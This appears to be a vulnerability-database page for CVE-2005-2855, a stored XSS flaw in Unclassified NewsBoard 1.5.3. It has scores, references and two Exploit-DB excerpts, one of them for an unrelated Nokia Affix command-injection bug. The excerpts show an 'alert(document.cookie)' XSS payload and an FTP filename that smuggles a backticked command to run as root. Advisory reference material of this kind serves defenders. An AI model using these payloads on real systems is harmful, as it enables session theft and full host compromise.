CVE-2005-2855
published 2005-09-08CVE-2005-2855: Cross-site scripting (XSS) vulnerability in Unclassified NewsBoard 1.5.3 allows remote attackers to inject arbitrary web script or HTML via the description…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.98%
78.0th percentile
Cross-site scripting (XSS) vulnerability in Unclassified NewsBoard 1.5.3 allows remote attackers to inject arbitrary web script or HTML via the description field.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| unclassified_newsboard | unclassified_newsboard | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Unclassified NewsBoard 1.5.3 - 'Description' HTML Injection
exploitdb·2005-09-06
CVE-2005-2855 Unclassified NewsBoard 1.5.3 - 'Description' HTML Injection
Unclassified NewsBoard 1.5.3 - 'Description' HTML Injection
---
source: https://www.securityfocus.com/bid/14748/info
Unclassified NewsBoard is prone to an HTML injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.
post new message and paste into description field:
alert(document.cookie)
Exploit-DB
Nokia Affix 2.0/2.1/3.x - BTSRV/BTOBEX Remote Command Execution
exploitdb·2005-07-12
CVE-2005-2277 Nokia Affix 2.0/2.1/3.x - BTSRV/BTOBEX Remote Command Execution
Nokia Affix 2.0/2.1/3.x - BTSRV/BTOBEX Remote Command Execution
---
source: https://www.securityfocus.com/bid/14232/info
Nokia Affix btsrv/btobex are reported prone to a remote command execution vulnerability. The issue exists due to a lack of input sanitization that is performed before using attacker-controlled data in a 'system()' call.
Because the affected services run with superuser privileges, this issue may be exploited to fully compromise a target computer that is running the affected software.
ftp> put /etc/hosts `id`
Transfer started...
Transfer complete.
257 bytes sent in 0.9 secs (2855.56 B/s)
ftp> ls
-rwdx 257 uid=0(root) gid=0(root) groups=0(root)
Command complete.
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=112605049014473&w=2http://packetstormsecurity.org/0509-exploits/unb153.htmlhttp://secunia.com/advisories/16726http://www.osvdb.org/19239http://www.securityfocus.com/bid/14748http://www.vupen.com/english/advisories/2005/1665https://exchange.xforce.ibmcloud.com/vulnerabilities/22172http://marc.info/?l=bugtraq&m=112605049014473&w=2http://packetstormsecurity.org/0509-exploits/unb153.htmlhttp://secunia.com/advisories/16726http://www.osvdb.org/19239http://www.securityfocus.com/bid/14748http://www.vupen.com/english/advisories/2005/1665https://exchange.xforce.ibmcloud.com/vulnerabilities/22172
2005-09-08
Published